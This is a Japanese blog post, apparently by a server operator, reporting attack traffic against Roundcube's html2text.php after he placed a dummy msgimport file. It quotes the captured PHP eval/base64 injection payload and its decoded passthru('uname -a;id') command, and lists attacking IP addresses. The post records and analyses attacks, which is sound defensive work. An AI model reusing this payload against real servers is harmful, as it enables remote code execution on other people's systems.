昨日書いた記事の続報なんですが、機械的にGETのリクエストでmsgimport探しているだけ（無ければ404になるだけ）なのでほっといたんですが、思い立ってダミーでmsgimport作ってみたらPOSTリクエストが来ました。

POST /bin/html2text.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Host: 内緒ｗ
（中略）
<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>

SANS記事からたどっていったところ（http://trac.roundcube.net/ticket/1485618）のコメント欄と同じ感じですね。
まーSQLインジェクションはAsproxボットネットが崩壊したあとも活発みたいだし、今でもいろんなの来てますねえ。
関連記事：迷惑メール業者「米マコロ」崩壊で，スパムの流量が減りボットネット「Asprox」の活動が低下 | 日経 xTECH（クロステック）
定期的にいろんな国から訪問いただくことは喜ばしい（笑）限りなんですが、今更追いかけて追加情報を出すほどでもなさそうだし、そろそろウザくなってきたのでGuardian@JUMPERZ.NETでたたき落とすかなあ　ﾌﾞﾌｯ∵(´ε(○=(ﾟ∀ﾟ　)
yamagataさんの要望があったのでわかってるところまで追記しときますと、Acceptヘッダの文字列はすぐBASE64変換してみたんだけど、こんな感じですた。

echo (6桁の数字+8桁の数字)." ";;passthru("uname -a;id");

echoの数字の処に何かからくりがあるんだろうけど、そこまだわかんないのでヘッダ隠してる（笑）んですよねー。
手元に来ているのはこんなところから（一部だけだよんｗ）。

• 192.116.71.51
• 200.85.152.236
• 202.64.77.93
• 203.81.55.161
• 209.160.20.34
• 209.160.64.190
• 209.250.250.137
• 212.95.32.171
• 216.245.217.122
• 218.22.69.25
• 218.247.40.136
• 58.215.88.10
• 61.19.249.19
• 64.18.158.36
• 64.85.162.58
• 67.159.5.184
• 67.205.76.148
• 67.214.166.138
• 67.215.6.210
• 72.232.177.10
• 72.9.153.205
• 78.159.112.98
• 78.41.202.180
• 78.41.206.116
• 78.41.206.228
• 79.99.132.6
• 83.170.93.18
• 84.244.130.30
• 85.112.3.98
• 87.233.176.117
• 87.98.219.144
• 89.149.196.216
• 91.196.169.226
• 92.48.127.158
• 93.84.112.158
• 94.102.51.174
• 94.76.206.2

あからさまに分散的なので、まーそういうことなんでしょうね。